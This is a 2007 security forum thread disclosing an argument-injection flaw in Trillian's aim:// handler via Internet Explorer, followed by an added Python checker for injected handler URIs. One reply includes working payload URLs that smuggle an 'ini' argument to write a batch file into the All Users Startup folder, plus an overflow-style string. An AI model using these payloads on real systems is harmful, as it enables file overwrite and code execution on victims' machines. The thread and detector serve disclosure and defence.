Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Cross Application Scripting (IE pwns Trillian pwns Startup Folder pwns All Users)
Posted by: nmcfeters
Date: July 13, 2007 03:25AM

Let the Trillian-sploitation continue!

This one is hilarious, so I have to post it. IE allows an attacker to perform a command injection into the arguments passed to Trillian through rundll32 when calling the aim:// URI. By closing off the first command line argument (url), an attacker can supply their own value for the second command line argument (ini). Trillian will take an arbitrary file location for this parameter and overwrite it with everything prior to the ini arg.

See PoC (http://www.xs-sniper.com/nmcfeters/Cross-App-Scripting-2.html) at BK Rios's xs-sniper.com site.

Re: Cross Application Scripting (IE pwns Trillian pwns Startup Folder pwns All Users)
Posted by: Anonymous User
Date: July 13, 2007 12:22PM

Wow - again awesome and frightening find. Good work!

BTW:

http://demo.php-ids.org/?test=aim:%20&c:%5cwindows%5csystem32%5ccalc.exe%2522%2520ini=%2522C:%5cDocuments%2520and%2520Settings%5cAll%2520Users%5cStart%2520Menu%5cPrograms%5cStartup%5cpwnd.bat%2522
http://demo.php-ids.org/?test=aim:///%231111111/11111111111111111111111111111111111111111111111111111111111112222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222226666666AAAABBBB6666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666

;)

Greetings,
.mario



Edited 2 time(s). Last edit at 07/13/2007 12:25PM by .mario.

Re: Cross Application Scripting (IE pwns Trillian pwns Startup Folder pwns All Users)
Posted by: nmcfeters
Date: July 13, 2007 02:49PM

Good to see that someone cares about protecting people from this stuff.

Re: Cross Application Scripting (IE pwns Trillian pwns Startup Folder pwns All Users)
Posted by: Anonymous User
Date: July 13, 2007 06:05PM

Ya - I am a little bit confused about the lack of reaction. I mean LFE/RFE is one of the most serious issues in client security. Is this possible with current versions of Trillian? Is the bug reported? If yes what did the developers say?

Greetings,
.mario

Re: Cross Application Scripting (IE pwns Trillian pwns Startup Folder pwns All Users)
Posted by: nmcfeters
Date: July 14, 2007 12:28AM

See my recent post. More evidence it's not just any one person's fault.



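The first post in this thread describes closing the quoted url argument so that a second ini argument reaches the handler, and the test URLs in .mario's reply carry that quote double-encoded (%2522). The following is an added example, not part of the thread and not PHPIDS or Trillian code: a check that a filter or a protocol-handler wrapper could run before a URI is placed on a command line. The function names, the sample URIs and the placeholder path are constructed for illustration.

```python
import re
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 5  # assumption: enough rounds to unwind nested percent-encoding

def fully_decode(uri: str) -> str:
    """Percent-decode repeatedly until the string stops changing (bounded)."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri = decoded
    return uri

# A name=value token that follows a quote or whitespace looks like an extra
# command-line argument rather than part of the URI itself.
EXTRA_ARG = re.compile(r'["\s]\s*([A-Za-z]+)\s*=', re.ASCII)

def inspect_handler_uri(uri: str) -> list[str]:
    """Return reasons why this URI should not be passed to a quoted argument."""
    findings = []
    decoded = fully_decode(uri)
    if '"' in decoded:
        findings.append("quote")          # would terminate the quoted argument
    match = EXTRA_ARG.search(decoded)
    if match:
        findings.append("extra-arg:" + match.group(1).lower())
    if any(ord(ch) < 0x20 for ch in decoded):
        findings.append("control-char")
    return findings

# Constructed samples (placeholder path, not taken from the thread).
BENIGN = "aim:goim?screenname=buddy&message=hello%20there"
SINGLE_ENCODED = ("aim:goim?screenname=buddy%22%20ini=%22"
                  "C:%5Cexample%5Cplaceholder.txt%22")
DOUBLE_ENCODED = ("aim:goim?screenname=buddy%2522%2520ini=%2522"
                  "C:%255Cexample%255Cplaceholder.txt%2522")

if __name__ == "__main__":
    for sample in (BENIGN, SINGLE_ENCODED, DOUBLE_ENCODED):
        print(inspect_handler_uri(sample), sample)
```

A check that looks for a literal `"` in the raw string misses both encoded samples, which is why the decode loop runs to a fixed point before matching.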